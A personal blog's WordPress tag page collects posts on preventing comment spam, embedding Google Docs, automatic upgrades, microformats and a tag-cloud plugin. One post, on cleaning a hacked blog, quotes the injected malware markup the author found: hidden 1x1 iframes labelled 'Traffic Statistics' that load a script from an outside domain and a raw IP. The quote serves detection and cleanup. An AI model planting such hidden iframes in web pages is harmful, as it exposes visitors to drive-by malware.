Posts Tagged ‘WordPress’

Blog Blogger blogging comment spam compliment spam firefox folksonomies Google Google Docs Google Spreadsheets how-to plugin plugins security social-bookmarking spam tag clouds tagging web-development

How to keep spam off your blog, bulletin board, or forum

Thursday, July 17th, 2008

Columns of gears in the difference engine Spam, it’s not just for breakfast and email anymore.  Webspam is a huge problem – if you run a blog or a forum, you’re probably familiar with the gobs and gobs of gibberish being posted all over the web by spammers.

This humble blog, which only gets a few hundred visitors per day, has had over 17,000 spam comments since I moved over to WordPress last year.  Having your site inundated with comment spam can be just as big a headache as getting hacked.  No one wants to spend hours every day sorting the good posts from the bad.  I’ve already written about how to totally clear out a spammed forum and erase all traces of it’s reputation-marring existence, but the best solution is prevention.

Here are some steps you can take to help prevent spam on your blog or forum.

Keeping Spam off Your Blog

This section assumes you’re hosting your own blog and can add plugins and make configurartion changes, and my examples will be WordPress-heavy because I’m more familiar with WordPress.

Option 1:  Close or restrict comments. Most blogs give you some options to restrict who can comment on articles.  In WordPress, you can require that users create accounts to comment under Settings -> General.  This might not help too much since I’ve seen hundreds of automated user accounts created right alongside the spam.

You can also require that comments are approved before they appear – in WordPress look under Settings -> Discussion.  This will stop your blog from being graffitied without your knowledge but also requires manual effort.  You can also disallow trackbacks and pingbacks, which are really cool in theory but a major avenue for automated spam.

You can also shut down comments completely, or disable comments on old posts.  At that point you may be throwing the baby out with the bathwater, but it’s certainly effective.

Option 2:  Make sure commenters are real people with a captcha. Even if you’re not familiar with the term, you’re familiar with captchas.  They’re the little widgets at the end of a form where you have to decipher some scrambled text from an image.  Many blogs have captcha options built in, but if you’re looking for a captcha plugin be sure to balance usability with security.

I’ve used the Did You Pass Math plugin with some success.  Jeff Atwood has used an extremely simple captcha for years on his high-traffic blog.  Recaptcha is a really cool project that helps fight automatic posting and digitize old books at the same time.

Option 3:  Use an automatic filtering system. If you’re using WordPress, I have three words for you:  Akismet, Akismet, Akismet! Seriously, Akismet is so good at automatically marking spammy commetns and trackbacks that it’s almost scary.  If you’re not using WordPress, you may still be able to find an Akismet plugin for your blogging platform.  There are other systems worth trying as well such as Spam Karma but I have less experience with those.

Keeping Spam off Your Forum

Again, I’m assuming you are hosting the forum yourself or can otherwise make config changes.  I’ll use phpBB (version 3) as an example because I’ve used it in the past.

Option 1:  Restrict user accounts. This can be a tough call, because when you start a forum you want to make it as easy as possible for people to join in the discussion.  Unfortunately, allowing anyone to register and begin posting without any admin approval also opens the door for spammers.

In phpBB this setting can be found in the Administration Control Panel under Board Configuration -> User Registration Settings.

Option 2:  Again with the captchas. Captchas aren’t 100 percent garanteed to remove spam but they do help.  If your forum software doesn’t have a captcha or a captcha plugin, I would seriously consider upgrading to a version that does or switching forums completely.  I know it’s a huge pain but waking up one morning to find 10,000 spam posts is even worse.

In phpBB3 look under Board Configuration -> User Registration Settings for a setting called “Enable visual confirmation for registrations” and make sure it’s turned on.  You can change the details under Board Configuration -> Visual confirmation settings.

Option 3:  Try to find an automatic filtering system. This is harder than for blogs.  There was an Akismet phpBB mod but it’s apparently not being maintained.  There’s a workaround involving the Spam Words mod that you can read about here.  The Spam Words mod might be worth trying on it’s own too.  Here’s a thread with more options for phpBB2, search around and find what’s available for your forum software.

Even without automated filtering, you can try to slow down the spammers by setting a time limit between posts (most human beings don’t type as quickly as spambots do).  Other options, such as disallowing links and BBCode, are pretty drastic but might make your blog less enticing.

Just for fun:

Spam, spam, bacon, and Spam

Embedding Google Docs and Spreadsheets into your Blog Posts

Sunday, July 6th, 2008

I just wrote a post about buying a new camera, and because I want to compare specs on several different cameras and lenses, I’m going to need a spreadsheet.  Luckily there are some great online spreadsheet programs to chose from.  I’m going to use this as an opportunity to explore how to use Google Docs and Spreadsheets in blog posts.

Before you get started I’m assuming you already have a Google Docs spreadsheet ready to go.

1.  You can always just link to the document. By default your docs will be private so you’ll need to make them available to your readers.  To do so you’ll need to either go to the Share tab and check “Anyone can view this document WITHOUT LOGGING IN at:” or go to the Publish tab and publish the doc. Either way you’ll get regular URL to post, like this one:  http://spreadsheets.google.com/ccc?key=ppevxmL24UqmeiZSbqIU1DQ&hl=en

Links aren’t very exciting though, so how can you embed into a post instead?

2.  You can embed the content into the post.  If you’re wondering how to do it in WordPress, one solution I’ve come across is the Inline Google Docs plugin at Broken Watch.  This plugin gets the actual text/html of the spreadsheet and places it inline in your post.  So if you have a wide blog template, or a spreadsheet with relatively few columns, it should blend right in.  On the other hand, there’s no editing or other fun.

Here’s an example of what the output looks like:

NOTE: I had to disable this, it was throwing errors once I upgraded to WordPress 2.7. You mileage may vary.

3.  You can put the doc directly in the page with an iframe. This works really, really well with Google Presentations but is a bit trickier with a doc and even less optimal with a spreadsheet. You’ll get the best-looking results if you publish the document and use the published URL in the iframe. On the other hand if you use the shared URL collaborators should be able to make changes right in your blog post.

You’ll want to create some code like this:

<iframe src=”http://spreadsheets.google.com/pub?key=ppevxmL24UqmeiZSbqIU1DQ” width=”500″ height=”400″></iframe>

Make sure you put the code in the “HTML” editing mode of WordPress rather than “Visual” mode.  As a result you can see some of the info I’ve gathered about possible camera / lens combinations in the spreadsheet below.

The main issue here is the relatively small iframe window size. If you use a wider blog template this technique might work really well.

Why bother? Spreadsheets aren’t the most exciting thing in the world for most people, but play around with all the features of Google Docs and Spreadsheets and you’ll see why this can be pretty cool.  You can embed questionnaires and surveys, cool charts and graphs with Gadgets, and anything else you can think of.

Keep your WordPress site from being hacked with automatic upgrades

Monday, May 5th, 2008

I’ve already written about what to do once your site has been hacked, but let’s talk a bit about hack prevention.

I think it’s fair to say that most people manage their own WordPress installation because they have some programming background and want a little more control than you get with a hosted solution like Blogger or WordPress.org.  Webmasters like you and me usually know a bit about security and how important it is to keep things up to date.  The problem is that every minute spent upgrading your CMS to the latest version is a minute not spent writing or running your business.

So you know you should download the latest patch, make backups, disable, plugins, install… but it’s already 1 a.m. and you need to meet clients in the morning, so you put it on the back burner and your site ends up hacked.  What’s the solution?  If you’re Technorati, the solution is to motivate bloggers a bit more by threatening to delist them.  I can understand their point of view.  But how about something a bit more positive – automation.

There are two ways I’ve automated WordPress upgrades.  One is through Fantastico, which is a really cool script management system that your web host should probably provide.  I’m giving up on Fantastico, though, because it takes a long time for it to notice updates.

The second way I just tried out recently is the WordPress Automatic Upgrade plugin.  I’ve tried it out on three blogs now and so far so good – it hasn’t skipped a beat.  This functionality really needs to be folded into WordPress itself – with 2.5, they added the ability to automatically upgrade plugins but it seems like most security holes lately are found in the WordPress code itself.

That plugin is WordPress-only, but I recommend doing some research to see if there’s something similar out their for your blog software or CMS.  Even if WordPress never has another security bug, there’s always Joomla, and Drupal, etc…

Fixing a ‘This site may harm your computer’ warning, part 2: Hidden iFrames

Thursday, March 6th, 2008

Earlier I wrote about what I did when my WordPress blog started returning a “This site may harm your computer” warning in Google and Firefox. Just to recap, these are the first steps to take to fix the problem:

  1. Plug the hole – update WordPress (or your blog, forum, or CMS software) to plug any security holes.
  2. Repair the damage – search for spammy outgoing links or malware files on your pages and delete them.
  3. Clear your good name – request a review by StopBadware.org and in Google Webmaster Tools.

This is the right process to follow, but it turns out that I was a bit premature in doing step 3. Spammers and spyware spreaders are a wily, unpredictable bunch and they can’t be expected to stick to simple tactics like inserting links into posts.

The other tactic they used on my site was inserting invisible iFrames. These are harder to find because there aren’t as many automated tools to find them (or, at least, I don’t know of any) so it takes some manual searching through your source code. Here’s what the malware code looked like:


<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->

<noscript></noscript> <iframe src=”http://61.132.75.71/iframe/wp-stats.php” frameborder=”0″ height=”1″ width=”1″></iframe><br />
<!– End Traffic Statistics –>

It looks like others have run into the same issue. Your anti-virus software may even give you a warning about a virus in a file named “wp-stats[1].htm.” In my case AVG Antvirus warned me about a trojan horse in my temp folder.

Once I removed the iframes, I resubmitted my request in Google Webmaster Tools. Here’s another helpful hint that took me a while to figure out: If only part of your site has been hacked and is marked in StopBadware.org’s database, you should Add that subdirectory as a new site in Webmaster Tools. Here’s an illustration (click to see full size):

webmaster-tools-subdir

In this screenshot you can see my main site, www.jasonmorrison.net. If I click there I don’t see any warning about spam or viruses in my blog at www.jasonmorrison.net/content. So I just added my blog as a new “site” and there I could see the warnings and make a reconsideration request.

One last thing: Google may send out an email to try to let you know about these sorts of problems. I never saw these emails, though, since they go to addresses like abuse@yourdomain.com and admin@yourdomain.comthat spammers also like to use. They ended up in my spam bucket. So you might want to whitelist email from google.com.

Next in part three I’ll talk about what to do when a whole subdomain (perhaps with a forum) is filled with spam. Please put questions or additional suggestions in the comments below.

What I did when my site showed up as a bad link

Wednesday, February 27th, 2008

This site is just a humble blog where I write a bit about programming, design, usability, and other topics I’m interested in. It’s nice that I get some readership and few few good comments now and again but I don’t have any real financial stake here, and I’m definitely not interested in trying to spam anyone, send them spyware, etc. So imagine my shock when I noticed that my blog comes up with a warning, “This site may harm your computer.”

This comes up in various places including Firefox 3 and Google searches.  Obviously no one is going to follow a link to my site with such a disclaimer. So where did it come from and what did I do to clear my sites good name?

The disclaimer comes from the findings of StopBadware.org, an effort that I had heard about in the past but hadn’t really looked into. It sounds like a great idea – it’s very difficult for users to investigate every single link they might click on, and some spyware and adware is hard to see before it’s too late. So Stopbadware.org is a sort of neighborhood watch for the web.

How did my site end up on the list? There are a number of possibilities, so the first step is to check StopBadware.org to see what they found. Follow this link to search for your URL. Make sure you search for your root domain, in my case jasonmorrison.net. Some subdomains or directories might show up with a report while others are still considered clean. This confused me for a while.

Once you see the details there it’s time to hunt for problems. If you have anything more than a simple, static site this can be more difficult than it might first seem. My site uses WordPress and allows user comments. A bad link to show up in a comment, or someone may have hacked the site using a known vulnerability. It looks like it was the latter in my case, but I’m getting ahead of myself. How do you find the bad link?

There are lots of tools to find incoming links to your site, but I’ve only found one so far that checks outgoing links, at Bad Neighborhood. Don’t blindly rely on this tool, but follow up on any links that you don’t recognize having put there yourself. I found a link in the middle of a post from a month or so ago to some spammy German site.

How did the link get there? I don’t think my site was hacked wholesale (or if it was, they were very subtle about it). More likely someone took advantage of my laziness as upgrading WordPress and used a known security exploit.

Now that we’ve found and removed the offending link and plugged any known security holes, it’s time to try to get the stigma removed. Follow the link to the StopBadware.org request for review page and fill out a request. If the badware report came from one of their partners, you may have to follow up with them as well. I’m still waiting to here back on my review, I’ll post an update when I know more.

Hopefully this has been helpful. Let me know if you have any questions or suggestions in the comments below.

The power of microformats

Monday, December 3rd, 2007

Considering a Descent A few months ago I attended a really interesting talk by Eric Meyer where he touched on the use of microformats.  You might know Eric from his excellent O’Reilly Press CSS books.

What are microformats?  Before giving an example, I’ll give a little context.  When Tim Berners-Lee created the web, he tried to make HTML simple, flexible, and meaningful.  He succeeded on the first two counts but the third was quickly left by the wayside – many designers didn’t care what a particular tag meant, so long as it could be used for page layout.  The use of tables to arrange graphic elements instead of holding tabular data is a perfect example.

So Berners-Lee has been talking for years about the next step – the semantic web.  In the semantic web, tags are used to say what a particular piece of content is, with all styling done with stylesheets.  There is, of course, more to the semantic web than just separating content and presentation, after all you can work that way with HTML and CSS now.  One other key component is the web of trust, where people and web sites are able to describe relationships to each other so that search engines can help you find trustworthy content automatically.

Unfortunately, the semantic web has not really taken off.  There have been lots of meetings and XML schemas but it’s all too complicated, the process is too bureaucratic, and everything is being designed from the top down.

This is where microformats come in.  Let’s say you have a blog and you’ve tagged all your articles.  You’d like to let search engines and aggregators like Technorati know what your tags are.  But HTML doesn’t have anything like this:

<tag>semantic web<tag>

So what do you do?  Simple, use the rel-tag microformat:

<a href=”http://example.com/tag/semantic+web” rel=”tag”>semantic web</a>

The microformat makes use of existing html tags and attributes and just follows simple conventions.  But now that this little bit of meaning can be interpreted by spiders and other programs, we’ve actually added a pretty powerful bit of functionality to the web.

Most blog software, including WordPress, includes does microformatting for you.  If install my tag cloud plugin Altocumulous, and view source, you can see for yourself.

For intranet purposes, the hCard and hCalendar microformats look promising.  Take a look at microformats.org to see why I think so.  I’ll write more on it later.

New WordPress plugin available – put tag clouds everywhere with Altocumulus

Tuesday, November 6th, 2007

If you’ve gone to any of my Category pages on this blog (my Academic papers, for example), you might have noticed I have a tag cloud with just the tags related to that category.  After I figured out how to do it I packaged it into a WordPress Plugin, called Altocumulus.

This goes along with my research interests into folksonomies and information retrieval.  I haven’t had the chance to study tag clouds empirically but my guess is that one giant tag cloud for an entire web site or blog might be more cool looking that useful for navigation.  I think that making use of tag relationships a bit more might show the strength of folksonomies for navigation.  So now, if you click to see my design pages, you can see the kinds of topics my designs cover.

For another example of this in action, take a look at Unsought Input, for example the Innovation page.

Go ahead and download version 0.1 now.   It requires WordPress 2.3 or higher.  This is my first WordPress plugin so I’m sure I’ll figure out ways to make it better over time.  If you have any bugs, pointers, or suggestions please leave them in the comments below.